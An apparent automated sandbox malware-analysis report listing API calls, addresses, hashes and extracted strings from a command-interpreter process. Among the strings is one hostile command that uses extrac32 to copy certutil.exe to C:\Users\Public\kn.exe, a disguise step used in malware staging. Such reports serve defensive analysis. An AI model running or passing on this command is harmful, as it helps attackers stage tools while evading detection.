                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7D151D485
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: iswspace.MSVCRT ref: 00007FF7D151D54D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D569
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151D3F0: wcschr.MSVCRT ref: 00007FF7D151D58C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT ref: 00007FF7D1527EEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3731854180-3554254475
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1580871199-2613899276
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: con
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: PE
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7D153849D,?,?,?,00007FF7D153F0C7), ref: 00007FF7D1520045
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7D153F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D1520071
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1520092
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7D15200A7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1520148
                                                                                                                                                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7D1520181
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Enum$Openwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3402383852-1459555574
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d4f4c8f74af0d88aae95a380f5de156173e19187bb68339be651d734a87c6bac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14A1A3A2A0864B82FB11BB55D0542BEE3A0EF86B90FD44532DA4F077A4DFBCD945C360
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$wcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 243296809-3043279178
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a6ccc6d7d108d94e6f23f96afce771ece97e41fbc1df8894acad856011204e38
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45A17D2370968B96FB65EB21D8403FDA390FB58748FD44076DA4E8B6A5DFBCE6448310
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DIRCMD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1405722092-1465291664
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fdbb5353d4670f72c5480c8a335cbab7be9b1e72735800b49f9621e63435fab7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8078cba09e9f127300f2d445a1f6b2ae68663ae13b6bf8917c390c7797f52333
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63817F72A04BC68AFB20DF60E8802ED77A5FB45748F91413ADA4E57B68DF7CD1458720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D151B9A1,?,?,?,?,00007FF7D151D81A), ref: 00007FF7D151CDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF7D15199DD), ref: 00007FF7D1519A39
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151DF60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00007FF7D151CEAA), ref: 00007FF7D151DFB8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151DF60: RtlFreeHeap.NTDLL ref: 00007FF7D151DFCC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D151DF60: _setjmp.MSVCRT ref: 00007FF7D151E03E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF7D15199DD), ref: 00007FF7D1519AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,00007FF7D15199DD), ref: 00007FF7D1519B0F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15196E8: memset.MSVCRT ref: 00007FF7D15197B2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15196E8: ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D1519880
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsupr.MSVCRT ref: 00007FF7D152B844
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcscmp.MSVCRT ref: 00007FF7D152B86D
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$wcschr$Process$AllocFree_setjmp_wcsuprmemsetwcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: FOR$ IF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3663254013-2924197646
APIs
• iswdigit.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F0D6
• iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F1BA
• wcschr.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F1E7
• iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F1FF
• iswdigit.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F2BB
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: iswdigit$iswspacewcschr
• String ID: )$=,;
• API String ID: 1959970872-2167043656
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: ErrorLast$InformationVolumeiswalphatowupper
• String ID: %04X-%04X$:
• API String ID: 930873262-1938371929
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3249344982-2616576482
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d7d38d81121354050f916f34c4663a8d1a04ecee0d9816bd4e96b5d9d2e7dbd7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A415E72618B4A86F7509F12A84436DBAA4FB49BC4FC84276DA4A477B4CF7CD1148B10
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526A73
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526A91
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526AB0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526AE3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D15268A3,?,?,?,?,?,?,?,00000000,?,00007FF7D15263F3), ref: 00007FF7D1526B01
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$iswdigit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2770779731-632268628
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6d428d263f2126f0e5c8e7bd73756f6dfc38bb692bfa2ac7bc216d10df8e933b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C631DA22A09A5A85FB50AF12E45027DB6A0FB45F45BD581B6DA4E433A4EFBCA404C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3192234081-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8e331706f79744905255204283b9adad29570e0ef952b7666042d98a07ccae56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94318C32A0865BCBF754AF21A40427DFAA1BB89B90FC09135EA5B037B1CFBDD4018B10
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521673
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152168D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521757
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152176E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D1521788
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7D15214D6,?,?,?,00007FF7D151AA22,?,?,?,00007FF7D151847E), ref: 00007FF7D152179C
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Alloc$Size
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3586862581-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: b25d85015698b8fd5004c13fe7897ec76e3a16acea9ed2acde6e18fcbf1eb1ca
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0916D62A09A5B81FB14AF15A49427DB6A0FB44B90FD98176DA4F837B0DFBCE441C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1313749407-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 487f39fc629e3016de51122b32d9271a89bd1cf49c2c42690b15f4d1d5844f41
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6851AF22B0968B42FB50BB51A8042BDE6D1BF55B90FD852B2DD5F477B0DFBCE4418260
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 920682188-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 19ecec929787481a0196fcf1cd43ad3c8af32e038fe7d0a2f6a70d27f14fc1da
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e085c0e934932d338285153c9ea3decf014a211b58656fc54525e3f8b2b0a2cc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7516E32705B8A8AEB21EF20D8542ECB7A1FB89B44F84817ACA4E47764DF7CD655C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        • extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe , xrefs: 00007FF7D151E00B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$FreeProcess_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 777023205-3344945345
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F1BA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F1E7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7D151E626,?,?,00000000,00007FF7D1521F69), ref: 00007FF7D151F1FF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7D1521F69,?,?,?,?,?,?,?,00007FF7D151286E,00000000,00000000,00000000,00000000), ref: 00007FF7D151F2BB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswdigit$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: )$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1959970872-2167043656
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3625580822-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memsetwcsspn
